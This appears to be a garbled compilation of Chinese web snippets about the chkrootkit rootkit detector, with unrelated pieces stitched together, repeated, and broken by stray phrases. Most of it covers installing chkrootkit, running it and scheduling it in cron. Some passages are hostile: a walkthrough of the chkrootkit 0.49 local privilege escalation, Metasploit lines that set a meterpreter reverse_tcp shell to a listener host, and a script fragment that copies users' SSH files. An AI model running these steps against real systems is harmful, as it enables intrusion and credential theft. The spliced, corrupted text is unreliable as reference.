chkrootkit简介 chkrootkit是一个linux下检RootKit的脚本,在某些检测中会调用当前目录的检测程序 官网:http://www.chkrootkit.org/ 下载源码:ftp ://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz 解压后执行 make 命令,就可以使用了 一般直接运行,一旦有INFECTED,说明可能被植入了RootKit /chkrootkit | grep INFECTED 总体流程 首先删除别名,确保接下来的一些操作不会用了被RootKit改变了的别名 ### workaround for some Bourne shell
0.49版本的chkrootkit程序之所以特别,是因为存在本地提权漏洞,使用命令searchsploit chkrootkit可以查询到漏洞情况。 ,或者甚至什么也不做,都能发现root用户会执行/bin/sh /root/chkrootkit-0.49/chkrootkit命令,使用0.49版本的chkrootkit程序来检查后门情况。 08、chkrootkit 既然确认了root用户会执行0.49版本的chkrootkit程序,那就看看怎么提权。 但是你会发现,即使什么也不做,root用户也会执行/bin/sh /root/chkrootkit-0.49/chkrootkit命令。 -0.49/chkrootkit命令。
开源工具,例如Linux Malware Detect和Chkrootkit,可以提醒您服务器上存在不需要的访客。 Chkrootkit Chkrootkit 是一款简单的 rootkit 检测器,它检查类 Unix 文件系统上各种感染迹象。 Chkrootkit 可以使用以下命令从标准存储库安装在 基于 Ubuntu 的系统 上: sudo apt-get install chkrootkit -y 在安装过程中,系统会询问你是否要配置 chkrootkit 如果你使用的是基于 Fedora 的发行版,则安装命令为: sudo dnf install chkrootkit -y 安装软件后,可以使用以下命令运行扫描: sudo chkrootkit 该应用程序将立即启动并开始检查已知的 你可以设置一个 cron 作业,让 chkrootkit 每晚(午夜)运行一次,使用以下命令: sudo crontab -e 在文件的底部,添加以下内容: 0 0 * * * sudo chkrootkit
ChkrootKit ChkrootKit 是一个免费的开源轻量级工具包,用于在本地检测系统是否被安装了 rootkit,它包含各种程序/脚本,其中包括: ● chkrootkit - 用于检查rootkit (项目地址:https://github.com/Magentron/chkrootkit) 4.
strace-tt-T -etrace=all-p$pid 扫描是否存在恶意驱动 枚举/扫描系统驱动:lsmod 安装chkrootkit进行扫描: wget ftp://ftp.pangeia.com.br /pub/seg/pac/chkrootkit.tar.gztar zxvf chkrootkit.tar.gzcd chkrootkit-0.52make sense. /chkrootkit 安装rkhunter进行扫描: Wgethttps://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter
/chkrootkit chmod +x ./busybox } function chkrootkit_info(){ echo "Doing chkrootkit" . /chkrootkit > /tmp/GatherInfo/chkrootkit.log 2>&1 } function network_info(){ echo "Gathering network cat /$user/.ssh/* > /tmp/GatherInfo/cat_$user_.ssh.log 2>&1 fi done } initial chkrootkit_info
last 涉及的log文件 /var/log/wtmp chmod 640 /var/log/wtmp (5) 不定期检查硬件损害情况 grep error /var/log/messages (6) 使用chkrootkit 检查rootkit chkrootkit -n| grep 'INFECTED' 或者使用脚本加入cron # cat chkrootkit.sh #! /bin/bash PATH=/usr/bin:/bin TMPLOG=`mktemp` # Run the chkrootkit /usr/bin/chkrootkit > $TMPLOG # Output the log cat $TMPLOG | logger -t chkrootkit # bindshe of SMTPSllHow to do some wrongs if [ ! -z "$(grep INFECTED $TMPLOG)" ] && \ grep INFECTED $TMPLOG | mail -s "chkrootkit report in `hostname`
pid] 计算文件的md5 md5sum [文件名] 通过比较前后md5值排除是否被改动 安全事件处置: webshell查杀 www.shellpub.com 病毒/rootkit查杀 www.chkrootkit.org 综合查杀工具 www.xmirror.cn/page/prodon 通常情况下linux的恶意程序处置,靠人工解决 chkrootkit功能: 检测是否被植入后门、木马、rootkit 检测系统命令是否正常 检测登录日志 使用方法: wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz tar zxvf chkrootkit.tar.gz cd chkrootkit-0.52 make sense 编译完成没有报错的话执行检查 . /chkrootkit Linux下常用安全工具 rkhunter功能: 系统命令(Binary)检测,包括Md5 校验 Rootkit检测 本机敏感目录、系统配置、服务及套间异常检测 三方应用版本检测
1、rootkit后门检测工具chkrootkit chkrootkit是一个Linux系统下查找并检测rootkit后门的工具,它的官方址: http://www.chkrootkit.org/。 chkrootkit的使用比较简单,直接执行chkrootkit命令即可自动开始检测系统。 下面是某个系统的检测结果: [root@server chkrootkit]# /usr/local/chkrootkit/chkrootkit Checking `ifconfig'... chkrootkit在检查rootkit的过程中使用了部分系统命令,因此,如果服务器被黑客入侵,那么依赖的系统命令可能也已经被入侵者替换,此时chkrootkit的检测结果将变得完全不可信。 为了避免chkrootkit的这个问题,可以在服务器对外开放前,事先将chkrootkit使用的系统命令进行备份,在需要的时候使用备份的原始系统命令让chkrootkit对rootkit进行检测。
good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now 0x03 工具篇 一、Rootkit查杀 chkrootkit 网址:http://www.chkrootkit.org 使用方法: wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz tar zxvf chkrootkit.tar.gz cd chkrootkit-0.52 make sense #编译完成没有报错的话执行检查 . /chkrootkit rkhunter 网址:http://rkhunter.sourceforge.net 使用方法: Wget https://nchc.dl.sourceforge.net/project
ChkrootKit ChkrootKit是一个免费的开源轻量级工具包,用于在本地检查rootkit的迹象。 它包含各种程序/脚本,其中包括: chkrootkit - 一个用于检查rootkit修改的系统二进制文件的shell脚本。 ifpromisc.c - 它检查接口是否处于混杂模式。
但是发现不是root权限 0x05本地提权 1、查看靶机的版本及内核信息 lsb_release -a 2、查看使用者的时程表 ls -la /etc/cron* 在/etc/cron.daily目录下发现chkrootkit 工具 3、查看chkrootki的版本 4、在Kali Linux中搜索chkrootkit 0.49版本的漏洞 5、查看提权步骤 cat /usr/share/exploitdb/exploits/ 2.以root身份运行chkrootkit,其文件/ tmp /update将以root身份执行。 如果攻击者知道管理员是定期运行chkrootkit(通过查看cron.daily获知),并且对/tmp(没有挂载noexec)有写访问权限,就可以利用该漏洞获取root权限。
它具有对不同存档格式的内置支持,包括 Zip、OLE2、SIS、Dmg、RAR、BinHex、Gzip、Tar、Bzip2、、Cabinet、CHM 等 2.Chkrootkit 顾名思义,Chkrootkit Chkrootkit 的特点 您可以在不安装软件的情况下扫描您的系统。 这是一个轻量级程序,这意味着它不会影响系统性能。 它还可以检测各种其他恶意软件和木马,如后门、TinyNDS 等。 3.
1、rootkit后门检测工具chkrootkit chkrootkit是一个Linux系统下查找并检测rootkit后门的工具,它的官方址: http://www.chkrootkit.org/。 chkrootkit的使用比较简单,直接执行chkrootkit命令即可自动开始检测系统。 下面是某个系统的检测结果: [root@server chkrootkit]# /usr/local/chkrootkit/chkrootkit Checking `ifconfig'... chkrootkit在检查rootkit的过程中使用了部分系统命令,因此,如果服务器被黑客入侵,那么依赖的系统命令可能也已经被入侵者替换,此时chkrootkit的检测结果将变得完全不可信。 为了避免chkrootkit的这个问题,可以在服务器对外开放前,事先将chkrootkit使用的系统命令进行备份,在需要的时候使用备份的原始系统命令让chkrootkit对rootkit进行检测。
工具排查 01、chkrootkit 1. wget ftp://ftp.chkrootkit.org/pub/seg/pac/chkrootkit.tar.gz 2. tar -zxvf chkrootkit.tar.gz 3. cd chkrootkit-<版本> 4. . /chkrootkit > result.txt 5. cat result.txt | grep -v "nothing found\|not infected\|not found\|not tested
1、rootkit后门检测工具chkrootkit chkrootkit是一个Linux系统下查找并检测rootkit后门的工具,它的官方址:http://www.chkrootkit.org/。 chkrootkit的使用比较简单,直接执行chkrootkit命令即可自动开始检测系统。 下面是某个系统的检测结果: [root@server chkrootkit]# /usr/local/chkrootkit/chkrootkit Checking `ifconfig'... chkrootkit在检查rootkit的过程中使用了部分系统命令,因此,如果服务器被黑客入侵,那么依赖的系统命令可能也已经被入侵者替换,此时chkrootkit的检测结果将变得完全不可信。 为了避免chkrootkit的这个问题,可以在服务器对外开放前,事先将chkrootkit使用的系统命令进行备份,在需要的时候使用备份的原始系统命令让chkrootkit对rootkit进行检测。
x64/meterpreter/reverse_tcp set lhost 192.168.63.142 set lport 4545 exploit -j exploit/unix/local/chkrootkit
入侵检测与防御 • 意图:实时监控和阻断恶意行为 • 实现方式: • 启用审计服务(auditd)记录关键操作 • 部署 fail2ban 防暴力破解 • 定期扫描 rootkit(rkhunter、chkrootkit 安装安全检查工具 sudo yum install rkhunter chkrootkit lynis -y 2. 定期扫描 sudo rkhunter --check sudo chkrootkit sudo lynis audit system 3.
ChkrootKit ChkrootKit是一个免费的开源轻量级工具包,用于在本地检查rootkit的迹象。 它包含各种程序/脚本,其中包括: chkrootkit - 一个用于检查rootkit修改的系统二进制文件的shell脚本。 ifpromisc.c - 它检查接口是否处于混杂模式。
rootkit自动化查杀 chkrootkit 使用方法: wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz tar zxvf chkrootkit.tar.gz cd chkrootkit-0.53 make sense . /chkrootkit rkhunter 使用方法: wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter